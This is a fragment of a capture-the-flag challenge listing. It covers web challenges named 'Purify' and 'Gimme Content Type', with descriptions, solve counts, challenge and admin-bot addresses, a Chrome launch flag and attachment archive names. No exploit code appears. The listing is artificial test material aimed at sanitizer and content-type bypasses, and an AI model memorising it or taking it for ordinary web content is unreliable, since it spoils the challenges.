Files: player_a466f9f2a43ac42473015d72342c262e8d4b9519.txz

✅ Purify - 4 solves

I think I downloaded the wrong DOMPurify.
Website: http://91.107.157.58:7000/
Admin bot: http://91.107.157.58:7001/

Files: purify_206ec7c8d65c88cb617775a62bc5ab9bcfaa7baa.txz

Gimme Content Type - 0 solves

I got your csp from asisctf 2023 finals, now gimme your content type!
Hint: app.alert
google-chrome '--unsafely-treat-insecure-origin-as-secure=http://91.107.157.58:8000'
website: http://91.107.157.58:8000
admin bot: http://91.107.157.58:8001

Files: gimme-content-type_ab8a9463c53d97e566e92643dcc2e1f971c7dead.txz